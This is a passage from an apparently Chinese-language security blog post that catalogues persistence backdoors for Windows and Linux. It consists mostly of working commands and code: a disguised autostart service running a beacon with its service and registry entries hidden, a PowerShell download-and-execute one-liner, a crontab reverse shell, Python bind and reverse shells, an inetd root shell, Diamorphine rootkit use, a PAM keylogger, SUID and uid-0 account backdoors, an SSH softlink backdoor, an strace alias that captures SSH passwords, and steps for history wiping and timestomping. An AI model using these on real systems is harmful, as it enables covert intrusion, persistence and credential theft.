sc create &quot;.NET CLR Networking 3.5.0.0&quot; binpath= &quot;cmd.exe /k C:\Users\administrator\beacon.exe&quot; depend= Tcpip obj= Localsystem start= auto
</code></pre>
<pre><code class="powershell">powershell创建自启动服务
new-service –Name &quot;.NET CLR Networking 3.5.0.0&quot; –DisplayName &quot;.NET CLR Networking 3.5.0.0&quot; –BinaryPathName &quot;cmd.exe /k C:\Users\administrator\beacon.exe&quot; –StartupType AutomaticDelayedStart
</code></pre>
</li>
<li><p>但创建的服务很容易被发现 通过 sc query 和 Get-Service 很容易发现，直接查询服务也能看见<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729640.png" alt="image-20221110181956500"><br>开启服务<code>sc start &quot;.NET CLR Networking 3.5.0.0&quot;</code></p>
</li>
<li><p>使服务拒绝访问</p>
<pre><code class="cmd">sc sdset &quot;.NET CLR Networking 3.5.0.0&quot; &quot;D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)&quot;
</code></pre>
<p>然后通过sc与get-server查找服务均无结果：</p>
<pre><code class="cmd">sc query |findstr &quot;.NET CLR Networking 3.5.0.0&quot;
get-service | findstr &quot;.NET CLR Networking 3.5.0.0&quot;
</code></pre>
<p>在知道服务名的前提下查询会显示拒绝访问：<br><code>sc query &quot;.NET CLR Networking 3.5.0.0&quot;</code><br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729703.png" alt="image-20221110184608987"></p>
</li>
<li><p>但这样做有一个问题：在注册表中很容易看到异常value。<br><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking 3.5.0.0</code><br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729078.png" alt="image-20221110184952435"><br>我们可以通过修改注册表的DACL来拒绝对值的查询，达到隐藏异常值的效果。<br>这里给出一个通过powershell修改注册表项的访问权限的简单脚本：<br>将这个脚本保存为1.ps1</p>
<pre><code class="powershell">function Server-Sddl-Change&#123;
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][String]$Name
)
$ROOT = &quot;HKLM:\SYSTEM\CurrentControlSet\Services\&quot;
$S = $ROOT+$NAME
$acl = Get-Acl $S
$acl.SetAccessRuleProtection($true, $false)
$person = [System.Security.Principal.NTAccount]&quot;Everyone&quot;
$access = [System.Security.AccessControl.RegistryRights]&quot;QueryValues&quot;
$inheritance = [System.Security.AccessControl.InheritanceFlags]&quot;None&quot;
$propagation = [System.Security.AccessControl.PropagationFlags]&quot;None&quot;
$type = [System.Security.AccessControl.AccessControlType]&quot;Deny&quot;
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
$person = [System.Security.Principal.NTAccount]&quot;Everyone&quot;
$access =
[System.Security.AccessControl.RegistryRights]&quot;SetValue,CreateSubKey,EnumerateSu
bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang
ePermissions,TakeOwnership&quot;
$inheritance = [System.Security.AccessControl.InheritanceFlags]&quot;None&quot;
$propagation = [System.Security.AccessControl.PropagationFlags]&quot;None&quot;
$type = [System.Security.AccessControl.AccessControlType]&quot;Allow&quot;
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
Set-Acl $S $acl
&#125;
</code></pre>
<p>kali上起一个http<br><code>python -m http.server 8080</code><br>受害机远程加载powershell脚本：</p>
<pre><code class="powershell">powershell.exe -exec bypass -nop -w hidden -c &quot;IEX((new-object net.webclient).downloadstring(&#39;http://192.168.1.147/1.ps1&#39;));Server-Sddl-Change -Name &#39;.NET CLR Networking 3.5.0.0&#39;&quot;
</code></pre>
<p><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729558.png" alt="image-20221110194805525"></p>
</li>
<li><p>成功隐藏，只要电脑重启就可以获得后门</p>
</li>
</ol>
<h3 id="lls后门"><a href="#lls后门" class="headerlink" title="lls后门"></a>lls后门</h3><p>web服务器上一般都 支持net 所以可以考虑利用net iis做一个后门<br>项目地址 <a target="_blank" rel="noopener" href="https://github.com/WBGlIl/IIS_backdoor">https://github.com/WBGlIl/IIS_backdoor</a><br>在网站目录下新建一个bin文件夹 这个文件夹 存放dll集 把IIS_backdoor_dll.dll存放在这里面<br>新建 web.config 或者在原有的文件上添加 内容</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;configuration&gt;
&lt;system.webServer&gt;
&lt;modules&gt;
&lt;add name=&quot;IIS_backdoor&quot; type=&quot;IIS_backdoor_dll.IISModule&quot; /&gt;
&lt;/modules&gt;
&lt;/system.webServer&gt;
&lt;/configuration&gt;
</code></pre>
<p>打开 IIS_backdoor_shell 把网址填写进去即可<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729237.png" alt="image-20221110201650944"></p>
<h2 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h2><h3 id="crontab计划任务弹shell"><a href="#crontab计划任务弹shell" class="headerlink" title="crontab计划任务弹shell"></a>crontab计划任务弹shell</h3><ol>
<li>crontab默认是开的<pre><code class="sh">crontab -l   //列出任务
crontab -e   //编辑任务
</code></pre>
</li>
<li>crontab -e<br><code>* * * * * /bin/bash -c &#39;/bin/sh -i &gt;&amp;/dev/tcp/192.168.1.135/4444 0&gt;&amp;1&#39;;\r%100c\n</code>计划任务反弹shell</li>
</ol>
<h3 id="vim-python3扩展后门"><a href="#vim-python3扩展后门" class="headerlink" title="vim python3扩展后门"></a>vim python3扩展后门</h3><p>适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统<br>正向后门</p>
<pre><code class="bash">#from https://www.leavesongs.com/PYTHON/python-shell-backdoor.html
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == &quot;__main__&quot;:
    server=socket(AF_INET,SOCK_STREAM)
    server.bind((&#39;0.0.0.0&#39;,11))
    server.listen(5)
    print (&#39;waiting for connect&#39;)
    talk, addr = server.accept()
    print (&#39;connect from&#39;,addr)
    proc = subprocess.Popen([&quot;/bin/sh&quot;,&quot;-i&quot;], stdin=talk,
        stdout=talk, stderr=talk, shell=True)
</code></pre>
<p>反向后门</p>
<pre><code class="bash">import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect((&quot;192.168.241.128&quot;, 6666));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call([&quot;/bin/sh&quot;, &quot;-i&quot;]);
</code></pre>
<ol>
<li>这里提供了两种后门，尽量用正向的，将后门保存为dir.py</li>
<li><code>systemctl stop firewalld.service</code>关防火墙</li>
<li> <code>nohup python3 dir.py &gt; /dev/null 2&gt;&amp;1 &amp;</code>  可以看到是python<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729045.png" alt="image-20221110220844632"><br>会开启一个11端口的正向后门kali使用nc直接连接即可<br><code>nohup vim -E -c &quot;pyfile dir.py&quot;&amp;</code>   这样就可以使vim了</li>
<li>隐藏进程<pre><code>mkdir null
mount --bind null /proc/5480
netstat -anpt
</code></pre>
#mount –bind命令是将前一个目录挂载到后一个目录上，所有对后一个目录的访问其实都是对前一个目录的访问，并且会将前一个目录路径隐藏起来（注意这里只是隐藏不是删除，数据未发生改变，仅仅是无法访问了）。<br>umount /proc/5480进行解除挂载</li>
</ol>
<h3 id="inetd服务后门"><a href="#inetd服务后门" class="headerlink" title="inetd服务后门"></a>inetd服务后门</h3><p>inetd是一个监听外部网络请求(就是一个socket)的系统守护进程，默认情况下为13端口。当inetd接收到一个外部请求后，它会根据这个请求到自己的配置文件中去找到实际处理它的程序，然后再把接收到的这个socket交给那个程序去处理。所以，如果我们已经在目标系统的inetd配置文件中配置好，那么来自外部的某个socket是要执行一个可交互的shell，就获取了一个后门。</p>
<ol>
<li>安装服务<br>sudo apt install openbsd-inetd</li>
<li>修改默认端口<br>sudo vim /etc/services<br>添加woot 4444/tcp #evil backdoor service</li>
<li>修改/etc/inetd.conf<br>woot stream tcp nowait root /bin/bash bash -i</li>
<li>sudo inetd    运行服务</li>
<li>kali使用nc连接 ，nc   192.168.1.146   4444</li>
</ol>
<h3 id="Rootkit"><a href="#Rootkit" class="headerlink" title="Rootkit"></a>Rootkit</h3><p>rootkit分为内核级和应用级两种:内核级的比如：Diamorphine，应用级的比如：Mafix<br>Mafix 是一款常用的轻量应用级别Rootkits，是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。应用级rookit，主要替换ls、ps、netstat命令来隐藏文件,检测：使用相关检测工具，比如：unhide</p>
<h4 id="Diamorphine"><a href="#Diamorphine" class="headerlink" title="Diamorphine"></a>Diamorphine</h4><ol>
<li>Diamorphine是一个C语言写的，运行于linux系统的rootkit，支持linux 内核版本2.6.x/3.x/4.x。(uname -a查看服务器内核版本)</li>
<li>安装Diamorphine-root运行<pre><code class="bash">git clone https://github.com/m0nad/Diamorphine.git
cd Diamorphine&amp;&amp;make
insmod diamorphine.ko
</code></pre>
</li>
<li>用法<br>```</li>
<li>低权限获得root权限(指定某用户进程，使某用户变成root)<br>kill -64 用户的pid    //一般是0,不可逆除非重启或者注销该用户</li>
<li>进程隐藏<br>kill -31 pid号 (对同一个pid号使用一次是隐藏，使用第二次是显示)</li>
<li>隐藏模块<br>kill -63 pid号 (如果分不清模块还是进程，lsmod 一下，你可以看到所有模块名称)</li>
<li>创建隐藏文件<br>只要是diamorphine_secret开头的文件名或者文件夹，就会自动隐藏</li>
<li>查找这个后门<br>diamorphine 这个模块通过insmod安装后，系统启动时候是不会显示的，如果需要显示，需要执行  kill -63 0       #如果不执行kill -63 0，执行lsmod是查看不到有这个模块的，执行后再执行lsmod | grep diamorphine 即可看到这个模块。</li>
<li>卸载diamorphine模块，需要root权限<br>rmmod diamorphine<br>```</li>
</ol>
<h3 id="协议后门"><a href="#协议后门" class="headerlink" title="协议后门"></a>协议后门</h3><p>在一些访问控制做的比较严格的环境中，由内到外的TCP流量会被阻断掉。但是对于UDP(DNS、ICMP)相关流量通常不会拦截。</p>
<h4 id="ICMP"><a href="#ICMP" class="headerlink" title="ICMP"></a>ICMP</h4><ol>
<li>主要原理就是利用ICMP中可控的data字段进行数据传输，具体原理请参考: <a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/41154036">https://zhuanlan.zhihu.com/p/41154036</a></li>
<li>开源工具：ICMP后门项目地址：<a target="_blank" rel="noopener" href="https://github.com/andreafabrizi/prism">https://github.com/andreafabrizi/prism</a></li>
</ol>
<h4 id="DNS"><a href="#DNS" class="headerlink" title="DNS"></a>DNS</h4><ol>
<li>在大多数的网络里环境中IPS/IDS或者硬件防火墙都不会监控和过滤DNS流量。主要原理就是将后门载荷隐藏在拥有PTR记录和A记录的DNS域中（也可以利用AAAA记录和IPv6地址传输后门），具体请参考：通过DNS传输后门来绕过杀软<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/85431">https://www.anquanke.com/post/id/85431</a></li>
<li>开源工具：DNS后门项目地址：<a target="_blank" rel="noopener" href="https://github.com/DamonMohammadbagher/NativePayload_DNS">https://github.com/DamonMohammadbagher/NativePayload_DNS</a></li>
<li>协议后门检测：对于DNS/ICMP这种协议后门，直接查看网络连接即可，因为在使用过程中会产生大量的网络连接，清除：kill进程、删除文件即可</li>
</ol>
<h3 id="PAM后门"><a href="#PAM后门" class="headerlink" title="PAM后门"></a>PAM后门</h3><ol>
<li>PAM使用配置 /etc/pam.d/ 下的文件来管理认证方式，应用程序调用相应的配置文件，以加载动态库的形式调用 /lib/security下的模块。<br>PAM配置可分为四个参数: 模块类型、控制标记、模块路径、模块参数，例如: session requiredpam_selinux.so open<br>上面提到的 sshd 软链接后门利用的 PAM 机制达到任意密码登录，还有一种方式是键盘记录。原理主要是通过 pam_unix_auth.c 打补丁的方式潜入到正常的 pam 模块中，以此来记录管理员的帐号密码。<br>利用步骤：复制patch到源代码目录 &gt;&gt;&gt; 打patch &gt;&gt;&gt; 编译 &gt;&gt;&gt; 将生成的pam_uninx.so文件覆盖到/lib/secruity/pam_unix.so下 &gt;&gt;&gt; 修改文件属性 &gt;&gt;&gt; 建立密码保存文件，并设置好相关的权限 &gt;&gt;&gt; 清理日志 &gt;&gt;&gt; ok<pre><code>#确保ssh开启pam支持
vim /etc/ssh/sshd_config
UsePAM yes
#自动化脚本
https://github.com/litsand/shell/blob/master/pam.sh
</code></pre>
检测<pre><code>1、通过Strace跟踪ssh
ps axu | grep sshd
strace -o aa -ff -p PID
grep open aa* | grep -v -e No -e null -e denied| grep WR
2、检查pam_unix.so的修改时间
stat /lib/security/pam_unix.so #32位
stat /lib64/security/pam_unix.so #64位
</code></pre>
清除：<code>yum reinstall pam</code></li>
</ol>
<h3 id="文件属性修改"><a href="#文件属性修改" class="headerlink" title="文件属性修改"></a>文件属性修改</h3><h4 id="文件时间修改"><a href="#文件时间修改" class="headerlink" title="文件时间修改"></a>文件时间修改</h4><p><code>touch -r  旧文件   新文件</code> 使新文件的时间和旧文件时间相同</p>
<h4 id="文件锁定"><a href="#文件锁定" class="headerlink" title="文件锁定"></a>文件锁定</h4><p>在Linux中，使用chattr命令来防止root和其他管理用户误删除和修改重要文件及目录，此权限用ls -al是查看不出来的，从而达到隐藏权限的目的。需要root权限</p>
<pre><code class="bash">chattr +i evil.php #锁定文件
rm -rf evil.php #提示禁止删除
lsattr evil.php #属性查看
chattr -i evil.php #解除锁定
rm -rf evil.php #彻底删除文件
</code></pre>
<h3 id="历史命令操作"><a href="#历史命令操作" class="headerlink" title="历史命令操作"></a>历史命令操作</h3><p>在shell中执行的命令，不希望被记录在命令行历史中，如何在linux中开启无痕操作模式呢？</p>
<h4 id="只针对你的工作关闭历史记录"><a href="#只针对你的工作关闭历史记录" class="headerlink" title="只针对你的工作关闭历史记录"></a>只针对你的工作关闭历史记录</h4><p><code>空格set +o history</code> //#备注：并且由于空格的缘故，该命令本身也不会被记录<br>上面的命令会临时禁用历史功能，这意味着在这命令之后你执行的所有操作都不会记录到历史中，然而这个命令之前的所有东西都会原样记录在历史列表中。<br>要重新开启历史功能，执行下面的命令：<br><code>空格set -o history </code>  //    恢复原状</p>
<h4 id="从历史记录中删除指定的命令"><a href="#从历史记录中删除指定的命令" class="headerlink" title="从历史记录中删除指定的命令"></a>从历史记录中删除指定的命令</h4><pre><code class="bash">history | grep &quot;keyword&quot;
history -d [num]
删除大规模历史操作记录，这里，我们只保留前150行：
sed -i &#39;150,$d&#39; ~/.bash_history
</code></pre>
<h4 id="passwd增加用户"><a href="#passwd增加用户" class="headerlink" title="passwd增加用户"></a>passwd增加用户</h4><p>/etc/passwd<br>用户名：密码：用户ID：组ID：身份描述：用户的家目录：用户登录后所使用的SHELL<br>/etc/shadow<br>/etc/shadow 各部分含义：<br>用户名：密码的MD5加密值：自系统使用以来口令被修改的天数：口令的最小修改间隔：口令更改的周期：口令失效的天数：口令失效以后帐号会被锁定多少天：用户帐号到期时间：保留字段尚未使用</p>
<ol>
<li>增加超级用户<pre><code class="bash">perl -le &#39;print crypt(&quot;passwd&quot;,&quot;salt&quot;)&#39;     //结果sadtCr0CILzv2
echo &quot;m123:sadtCr0CILzv2:0:0:root:/root:/bin/bash&quot; &gt;&gt; /etc/passwd
</code></pre>
</li>
</ol>
<h3 id="suid后门"><a href="#suid后门" class="headerlink" title="suid后门"></a>suid后门</h3><p>当一个文件所属主的x标志位s(set uid简称suid)时，且所属主为root时，当执行该文件时，其实是以root身份执行的。必要条件：</p>
<pre><code>SUID权限仅对二进制程序有效。
执行者对于该程序需要具有x的可执行权限
本权限仅在执行该程序的过程中有效
在执行过程中执行者将具有该程序拥有者的权限
</code></pre>
<p>创建suid权限的文件：</p>
<pre><code>cp /bin/bash /tmp/.woot
chmod 4755 /tmp/.woot
ls -al /tmp/.woot
-rwsr-xr-x 1 root root 690668 Jul 24 17:14 .woot
</code></pre>
<p>使用文件获得root权限</p>
<pre><code class="bash">/tmp/.woot
/tmp/.woot -p //bash2 针对 suid 有一些护卫的措施，使用-p参数来获取一个root shellhttps://blog.csdn.net/fatshaw/article/details/6171035
</code></pre>
<p>检查:查找具有suid权限的文件即可</p>
<pre><code>find / -perm +4000 -ls
find / -perm -u=s -type f 2&gt;/dev/null
</code></pre>
<h3 id="SSH后门"><a href="#SSH后门" class="headerlink" title="SSH后门"></a>SSH后门</h3><h4 id="ssh软连接后门"><a href="#ssh软连接后门" class="headerlink" title="ssh软连接后门"></a>ssh软连接后门</h4><p>软连接后门的原理是利用了PAM配置文件的作用，将sshd文件软连接名称设置为su，这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su)，然而 su 在 pam_rootok 只检测uid 0 即可认证成功，这样就导致了可以使用任意密码登录:<br><code>ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345</code><br><code>ssh root@192.168.1.148 -p12345</code><br><code>systemctl stop firewalld.service</code>有防火墙关防火墙<br><a target="_blank" rel="noopener" href="http://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/">http://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/</a><br>优点：能够绕过一些网络设备的安全流量监测，但是本地在查看监听端口时会暴露端口，建议设置成8081，8080等端口。</p>
<h4 id="SSH公钥免密登录"><a href="#SSH公钥免密登录" class="headerlink" title="SSH公钥免密登录"></a>SSH公钥免密登录</h4><pre><code class="bash">ssh-keygen -t rsa //生成公钥
cat id_rsa.pub &gt; authorized_keys //将id_rsa.pub内容放到目标.ssh/authorized_keys里
</code></pre>
<p>这个是老生常谈的公钥免登陆，这种用法不只是用在留后门，还可以在一些特殊情况下获取一个交互的shell，如struts写入公钥，oracle写入公钥连接，Redis未授权访问等情景。</p>
<pre><code class="bash">chmod 600 id_rsa
ssh -i id_rsa root@192.168.1.148
</code></pre>
<h4 id="SSH-Keylogger记录密码"><a href="#SSH-Keylogger记录密码" class="headerlink" title="SSH Keylogger记录密码"></a>SSH Keylogger记录密码</h4><p>当前系统如果存在strace的话，它可以跟踪任何进程的系统调用和数据，可以利用 strace 系统调试工具获取 ssh 的读写连接的数据，以达到抓取管理员登陆其他机器的明文密码的作用。<br>在当前用户的 .bashrc 里新建一条 alias ，这样可以抓取他登陆其他机器的 ssh 密码</p>
<pre><code>vim ~/.bashrc
添加alias ssh=&#39;strace -o /tmp/.sshpwd-`date &#39;+%d%h%m%s&#39;`.log -e read,write,connect -s2048 ssh&#39;
source .bashrc    //刷新环境变量
</code></pre>
<p><code>grep -A 9 &#39;password&#39;  /tmp/.sshpwd-1211月111668255299.log</code>  查看ssh登录密码<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251730867.png" alt="image-20221112202325850"></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 1210396142@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2025 ziyebuku
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>






<div class="mobile-menus-out" >

</div>
<div class="mobile-menus">
    
    
    
    <a class="dynamic-menu " target="_self"   href="http://sunwu.world/">子夜旅馆</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="http://pan.sunwu.world/">子夜旅馆的网盘</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="https://github.com/sunwu57">github</a>
    
</div>


</html>
